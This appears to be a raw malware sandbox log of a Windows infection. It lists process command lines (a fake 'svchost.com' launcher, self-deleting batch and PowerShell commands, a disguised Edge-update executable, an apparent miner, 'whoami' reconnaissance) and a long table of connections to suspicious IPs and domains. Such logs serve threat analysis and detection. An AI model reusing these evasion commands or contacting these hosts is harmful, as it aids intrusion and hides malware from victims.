"C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe"

C:\PROGRA~1\MOZILL~1\firefox.exe

C:\PROGRA~1\MOZILL~1\firefox.exe

C:\PROGRA~1\MOZILL~1\firefox.exe

C:\PROGRA~1\MOZILL~1\firefox.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd1b6846f8,0x7ffd1b684708,0x7ffd1b684718

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {2e6a4698-87b5-4c10-9b1f-73add825db45} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" gpu

C:\Users\Admin\AppData\Roaming\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=2304 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 23775 -prefMapSize 244658 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {c7ac28f1-d6a8-437f-b496-3ca8ff23aaed} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" socket

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9A1E.tmp.bat

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=3148 -childID 1 -isForBrowser -prefsHandle 3140 -prefMapHandle 3136 -prefsLen 23916 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {c81dd25a-d764-4715-8d51-f2c689cc3f58} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=3696 -childID 2 -isForBrowser -prefsHandle 3652 -prefMapHandle 3688 -prefsLen 29149 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {0448c56f-727f-4722-8947-1634f3661c45} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5124 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5112 -prefMapHandle 1748 -prefsLen 29337 -prefMapSize 244658 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {330e2f9a-c1f2-482a-aaf3-d76c0d3c435d} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" utility

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4928 /prefetch:2

C:\Users\Admin\AppData\Local\asm\mi.exe

"C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5408 -childID 3 -isForBrowser -prefsHandle 2312 -prefMapHandle 5392 -prefsLen 27190 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {0804809b-f364-4d84-a5e3-a074c3903e1d} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4768 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\mi.exe --config="C:\Users\Admin\AppData\Local\asm\config.json"

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=5504 -childID 4 -isForBrowser -prefsHandle 5512 -prefMapHandle 5392 -prefsLen 27190 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {54d9bf81-1065-42fa-9b13-d6c6e3427570} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2500 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,62560502118672928,9793663927777835216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2144 /prefetch:2

C:\Windows\system32\whoami.exe

whoami

C:\PROGRA~1\MOZILL~1\firefox.exe

"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=4236 -childID 5 -isForBrowser -prefsHandle 876 -prefMapHandle 1108 -prefsLen 27380 -prefMapSize 244658 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {d21cf4fc-4c04-4101-a030-d624ad01546b} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" tab

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Local\palladiums\translucently.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE"

C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE

C:\Users\Admin\AppData\Local\Temp\TMPAED~1.EXE

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\200ebe9e8e08453590aa104a8d12444e /t 3636 /p 3572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 8112 -ip 8112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8112 -s 2320

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\werfault.exe

werfault.exe /hc /shared Global\7e9ef29517a347469a2f4f53bc431d0f /t 4088 /p 4060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 8652 -ip 8652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8652 -s 1584

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network4726Man.cmd"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\Network4726Man.cmd

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
N/A 127.0.0.1:49848 tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 3434.filelu.cloud udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 irp.cdn-website.com udp
US 8.8.8.8:53 kolobrownsalesye-fong.com udp
US 216.158.238.61:80 216.158.238.61 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
US 66.165.227.66:80 66.165.227.66 tcp
US 66.165.227.66:80 66.165.227.66 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
HK 43.155.93.125:80 43.155.93.125 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 123.60.37.61:9999 tcp
US 136.0.44.4:8000 136.0.44.4 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 123.130.204.103:8888 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 49.12.117.119:80 49.12.117.119 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
US 75.18.210.21:80 75.18.210.21 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
CN 110.40.250.173:2324 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 cdn-downloads.com udp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 dctdownload.s3.amazonaws.com udp
GB 20.26.156.215:80 github.com tcp
US 67.23.237.28:80 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 8.8.8.8:53 cdn-downloads-now.xyz udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 csg-app.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 198.54.115.214:443 kolobrownsalesye-fong.com tcp
FR 99.86.91.47:443 irp.cdn-website.com tcp
IE 52.92.2.241:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.109.154:443 dctdownload.s3.amazonaws.com tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
SE 129.151.210.233:8000 129.151.210.233 tcp
US 8.8.8.8:53 139520.aioc.qbgxl.com udp
NL 4.180.120.64:8000 4.180.120.64 tcp
US 8.8.8.8:53 83-87-76-41.cable.dynamic.v4.ziggo.nl udp
CN 49.234.48.162:80 tcp
US 166.167.172.14:8007 166.167.172.14 tcp
US 8.8.8.8:53 a15aaa1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 down10d.zol.com.cn udp
ES 47.62.190.226:8081 47.62.190.226 tcp
CN 8.137.59.132:8888 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
MA 102.53.15.17:80 102.53.15.17 tcp
DE 172.105.66.118:80 172.105.66.118 tcp
US 103.130.147.211:80 103.130.147.211 tcp
IE 52.218.109.154:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.90.202:443 dctdownload.s3.amazonaws.com tcp
RU 89.175.24.90:8080 89.175.24.90 tcp
US 144.34.162.13:80 144.34.162.13 tcp
US 8.8.8.8:53 www.beiletoys.com udp
US 8.8.8.8:53 data.yhydl.com udp
US 8.8.8.8:53 casacoimbramaputo.com udp
US 8.8.8.8:53 dcwblida.dz udp
CN 139.159.155.204:81 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 119.117.12.49.in-addr.arpa udp
US 8.8.8.8:53 132.249.42.81.in-addr.arpa udp
US 8.8.8.8:53 47.91.86.99.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 138.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 241.2.92.52.in-addr.arpa udp
US 8.8.8.8:53 61.238.158.216.in-addr.arpa udp
US 8.8.8.8:53 154.109.218.52.in-addr.arpa udp
US 8.8.8.8:53 64.120.180.4.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
HK 47.79.66.210:443 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
NL 83.87.76.41:80 83-87-76-41.cable.dynamic.v4.ziggo.nl tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
US 209.124.70.44:443 casacoimbramaputo.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 8.8.8.8:53 233.210.151.129.in-addr.arpa udp
CN 61.160.195.64:80 139520.aioc.qbgxl.com tcp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 taodianla.com udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
HK 134.122.129.20:80 134.122.129.20 tcp
US 8.8.8.8:53 28.237.23.67.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 66.227.165.66.in-addr.arpa udp
US 8.8.8.8:53 202.90.218.52.in-addr.arpa udp
US 8.8.8.8:53 118.66.105.172.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 214.115.54.198.in-addr.arpa udp
US 8.8.8.8:53 226.190.62.47.in-addr.arpa udp
US 8.8.8.8:53 125.93.155.43.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 33.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 17.15.53.102.in-addr.arpa udp
US 8.8.8.8:53 90.24.175.89.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 4.44.0.136.in-addr.arpa udp
US 8.8.8.8:53 211.147.130.103.in-addr.arpa udp
US 8.8.8.8:53 13.162.34.144.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 14.172.167.166.in-addr.arpa udp
CN 122.143.2.98:80 down10d.zol.com.cn tcp
IE 52.218.63.10:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.90.202:443 dctdownload.s3.amazonaws.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
DE 172.105.66.118:8080 tcp
US 166.167.172.14:8240 166.167.172.14 tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
CN 121.40.155.21:80 www.beiletoys.com tcp
ID 103.123.98.86:80 103.123.98.86 tcp
CN 47.110.247.171:80 tcp
US 8.8.8.8:53 41.76.87.83.in-addr.arpa udp
US 8.8.8.8:53 44.70.124.209.in-addr.arpa udp
US 8.8.8.8:53 169.92.116.50.in-addr.arpa udp
US 8.8.8.8:53 20.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 10.63.218.52.in-addr.arpa udp
US 8.8.8.8:53 210.66.79.47.in-addr.arpa udp
RU 176.111.174.138:443 tcp
CN 114.215.27.238:14417 tcp
CN 183.57.21.131:8095 tcp
DZ 41.111.143.136:443 dcwblida.dz tcp
US 66.63.187.231:80 66.63.187.231 tcp
HK 103.68.192.104:80 taodianla.com tcp
IT 217.58.56.138:8001 217.58.56.138 tcp
CN 123.60.59.48:80 tcp
CN 180.140.124.53:60 tcp
US 67.213.59.251:80 67.213.59.251 tcp
IE 52.218.63.10:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.2.25:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 cfs5.tistory.com udp
CN 139.198.15.223:8080 tcp
IE 52.92.2.25:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.32.209:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 86.98.123.103.in-addr.arpa udp
US 8.8.8.8:53 136.143.111.41.in-addr.arpa udp
US 8.8.8.8:53 25.2.92.52.in-addr.arpa udp
US 8.8.8.8:53 138.56.58.217.in-addr.arpa udp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
US 8.8.8.8:53 251.59.213.67.in-addr.arpa udp
US 8.8.8.8:53 209.32.92.52.in-addr.arpa udp
US 8.8.8.8:53 104.192.68.103.in-addr.arpa udp
CN 150.158.25.244:9000 tcp
IE 52.92.17.233:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.32.209:443 dctdownload.s3.amazonaws.com tcp
TH 147.50.240.62:80 147.50.240.62 tcp
NL 185.180.196.46:80 185.180.196.46 tcp
KR 211.231.99.68:80 cfs5.tistory.com tcp
IE 52.92.17.233:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.2.241:443 dctdownload.s3.amazonaws.com tcp
KR 1.214.192.147:80 1.214.192.147 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 8.8.8.8:53 hallowed-noisy.sbs udp
US 8.8.8.8:53 plastic-mitten.sbs udp
US 8.8.8.8:53 looky-marked.sbs udp
US 8.8.8.8:53 233.17.92.52.in-addr.arpa udp
US 8.8.8.8:53 62.240.50.147.in-addr.arpa udp
US 8.8.8.8:53 46.196.180.185.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 68.99.231.211.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 wrench-creter.sbs udp
US 8.8.8.8:53 slam-whipp.sbs udp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
US 8.8.8.8:53 download.caihong.com udp
US 8.8.8.8:53 record-envyp.sbs udp
US 8.8.8.8:53 copper-replace.sbs udp
US 8.8.8.8:53 osecweb.ir udp
US 8.8.8.8:53 savvy-steereo.sbs udp
RU 176.111.174.138:443 tcp
IR 185.79.156.69:80 osecweb.ir tcp
US 8.8.8.8:53 preside-comforter.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 147.192.214.1.in-addr.arpa udp
GB 104.82.234.109:443 steamcommunity.com tcp
HK 47.79.66.210:80 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
CN 123.6.72.99:80 download.caihong.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 104.21.82.174:443 marshal-zhukov.com tcp
US 8.8.8.8:53 fish.hackbiji.cc udp
US 144.34.162.13:80 fish.hackbiji.cc tcp
US 8.8.8.8:53 69.156.79.185.in-addr.arpa udp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 174.82.21.104.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 172.67.181.44:443 dare-curbys.biz tcp
US 8.8.8.8:53 44.181.67.172.in-addr.arpa udp
HK 154.201.87.30:8888 154.201.87.30 tcp
US 8.8.8.8:53 bitkiselurunsiparis.com udp
US 8.8.8.8:53 www.medises.co.kr udp
US 23.241.17.95:80 23.241.17.95 tcp
US 8.8.8.8:53 95.17.241.23.in-addr.arpa udp
